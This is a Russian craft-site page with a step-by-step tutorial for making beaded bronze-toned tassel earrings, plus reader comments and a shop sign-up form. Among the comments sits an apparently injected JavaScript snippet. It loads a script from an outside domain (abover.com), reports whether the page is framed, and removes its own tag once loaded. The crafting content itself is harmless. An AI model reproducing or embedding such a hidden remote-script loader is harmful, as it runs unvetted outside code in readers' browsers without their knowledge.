> Журнал > Мастер-Классы > Создаем серьги «Бронзовый сад»

Создаем серьги «Бронзовый сад»

05.06.2013 16:14     Просмотров: 5616     Комментариев: 14     
Виды творчества:   Бижутерия своими руками > Сборка украшений
Сложность:   ниже средней
Время работы:   2 часа
Создаем серьги «Бронзовый сад» | Ярмарка Мастеров - ручная работа, handmade

Представляю вам мастер-класс по созданию сережек из бисера и фурнитуры, которые просты в исполнении и под силу всем желающим.

Итак, приступим. Нам понадобится:

1. Пуссеты (основы для серег).

2. Шапочки для бусин, 2шт. (глубокие).

3. Пины, 2шт. (от 30 мм длиной).

4. Бисер 2-х видов ( в данном случае я использовала рубку Matsuno и чешский бисер №11).

5. Биконусы 3-4мм ( количество зависит от того, сколько будет низок бисера).

6. Бусины, 2шт. ( граненные или гладкие, овальные или круглые - на ваш выбор).

7. Нить для бисероплетения ( я взяла лавсановую текстурированную нить).

8. Игла для бисероплетения (чем длиннее, тем лучше).

9. Инструменты: ножницы, мини плоскогубцы, мини круглогубцы.

серьги

Начинаем!

Берем пин. Отступив 15мм от его края, сгибаем плоскогубцами, как на фото:

бронза

Затем, круглогубцами загибаем в кольцо:

бисер

Отматываем нить, примерно, 2м длинной. Привязываем к кольцу так, что бы два конца нити оказались одинаковой длины:

серёжки

Вставляем один конец нити в иглу и начинаем набор: 20 рубки (количество зависит от желаемой длины), 1 биконус, 1 бисерина №11 :

сборка украшений

Подтягиваем весь набор до кольца и проходим иглой назад, пропуская  бисерину №11, через биконус и всю рубку:

сборка

Подтянуть нить, чтобы ее не было видно между бисеринами. Затем, надо закрепить узелком за кольцо, чтоб набор не "ездил" по нитке :

бижутерия своими руками

И таким образом набираем нужное количество низок (у меня их, штук по 14), каждую закрепляем узелком. Как закончится один конец нити, сделать 2-3 узелка, вздеть иглу во вторую нить и продолжать таким же спосбом. Вот, что должно получится:

украшения

Отрезаем концы оставшихся нитей. Надеваем шапочку и бусину:

украшения ручной работы

Делаем кольцо, как и в самом начале: отгибаем пин под прямым углом, загибаем круглогубцами ( для кольца нужно 12мм, лишнее отсечь кусачками).

украшение

После чего надеть пуссету и зажать кольцо:

украшения из бисера

Готово!!!!

украшения своими руками

Надеюсь, что у вас все получится. Успехов в творчестве! 

Ключевые слова:  
Материалы:  
Ярмарка Мастеров - ручная работа, handmade

SenioraBusinka

Спасибо за МК. С первого взгляда все выглядет не сложно. Попробую{#}

Дюшес (diushes)

Пожалуйста .{#}

Спасибо{#}, обязательно сделаю себе такие{#}

Не могу понять, какого цвета у вас фурнитура {#} Мой монитор показывает желто-зеленый О_о

Дюшес (diushes)

Бронзовая {#}

Спасибо за идею!Все просто и красиво!!!!

Спасибо! Так подробно и понятно {#}, что хочется попробовать сделать себе такие!

Спасибо за МК! А я всегда мучилась с такими хвостиками - набирала ниток в два раза меньше, чем надо, но в два раза длиннее, потом перегибала пополам. Но всегда была проблема угадать длину нитки, то слишком коротко и натянуто получается, то слишком болтается. Возьму Ваш МК на вооружение!

Отлично! Просто и эффектно!{#}

Спасибо большое!

Пожалуйста {#}

// <![CDATA[ (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); // ]]>
tatika
А насколько практичные такие серьги. Красивые, легкие в исполнении. Спасибо за идею. Но , кажется, что уши оторвутся от такого веса. Все таки кистей много.
Ирина

Уважаемая Дюшес! Я только что изучила Ваш мастер-класс, очень понравилось и большое спасибо. У меня к Вам вопрос: сейчас очень актуальны такие украшения, в частности сотуары с длинной кистью или серьги, так в их создании применяется именно эта техника? А если шапочка в виде большой короны, где внизу крестообразные перекладинки, тоже также делать? Очень жду Вашего ответа, заранее благодарю.

Жми «Нравится»
и подписывайся на нас в Facebook!

Шаг 1 из 3: Создание магазина

Откройте собственный онлайн-магазин в несколько простых шагов и зарабатывайте любимым творчеством
Как будет называться магазин?
Какой у него будет web-адрес?

Шаг 2 из 3: Регистрация

Укажите контактные данные для своего магазина. Уже есть аккаунт?
Введите email
Придумайте пароль
Укажите свой город
< Назад

Шаг 3 из 3: Проверка email

• Магазин
Остался завершающий шаг! Мы отправили Вам письмо, перейдите по ссылке в нем, чтобы подтвердить свою почту и начать работу с магазином.
Если письмо не пришло — можем отправить еще раз